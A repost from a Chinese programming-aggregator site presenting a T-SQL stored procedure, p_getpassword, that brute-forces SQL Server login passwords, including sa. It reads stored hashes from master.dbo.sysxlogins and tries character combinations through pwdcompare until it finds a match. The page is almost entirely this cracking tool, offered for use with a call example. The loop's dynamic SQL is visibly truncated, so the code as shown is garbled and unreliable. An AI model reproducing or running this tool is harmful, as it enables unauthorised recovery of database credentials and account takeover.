存储过程实例:SQL Server Sa密码破解

存储过程实例:SQL Server Sa密码破解,第1张

概述一个SQL Server Sa密码破解存储过程: if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1) drop procedure [dbo].[p_GetPassword] GO /*--穷举法破解 SQL Server 用户密码 可以破解中文,特殊字符,字符+尾随空格… 一个sql Server Sa密码破解的存储过程:
if exists (select * from dbo.sysobjects where ID = object_ID(N'[dbo].[p_getpassword]') and OBJECTPROPERTY(ID,N'IsProcedure') = 1)

drop procedure [dbo].[p_getpassword]

GO

/*--穷举法破解 sql Server 用户密码

可以破解中文,特殊字符,字符+尾随空格的密码

为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII

理论上可以破解任意位数的密码

条件是你的电脑配置足够,时间足够

/*--调用示例

exec p_getpassword

--*/

create proc p_getpassword

@username sysname=null,--用户名,如果不指定,则列出所有用户

@pwdlen int=2 --要破解的密码的位数,默认是2位及以下的

as

set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

select top 255 ID=IDentity(int,1) into #t from syscolumns

alter table #t add constraint PK_#t primary key(ID)

select name,password

,type=case when xstatus&2048=2048 then 1 else 0 end

,jm=case when password is null then 1 else 0 end

,pwdstr=cast('' as sysname)

,pwd=cast('' as varchar(8000))

into #pwd

from master.dbo.sysxlogins a

where srvID is null

and name=isnull(@username,name)

declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

declare @l int

select @l=0

,@s1='char(aa.ID)'

,@s2='cast(aa.ID as varchar)'

,@s3=',#t aa'

exec('

update pwd set jm=1,pwdstr='+@s1+'

,pwd='+@s2+'

from #pwd pwd'+@s3+'

where pwd.jm=0

and pwdcompare('+@s1+',pwd.password,pwd.type)=1

')

while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

begin

select @l=@l+1

,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.ID)'

,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.ID as varchar)'

,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)

exec('

update pwd set jm=1,pwd.type)=1

')

end

select 用户名=name,密码=pwdstr,密码ASCII=pwd

from #pwd

go
总结

以上是内存溢出为你收集整理的存储过程实例:SQL Server Sa密码破解全部内容,希望文章能够帮你解决存储过程实例:SQL Server Sa密码破解所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/sjk/1158316.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-01
下一篇 2022-06-01

发表评论

登录后才能评论

评论列表(0条)

保存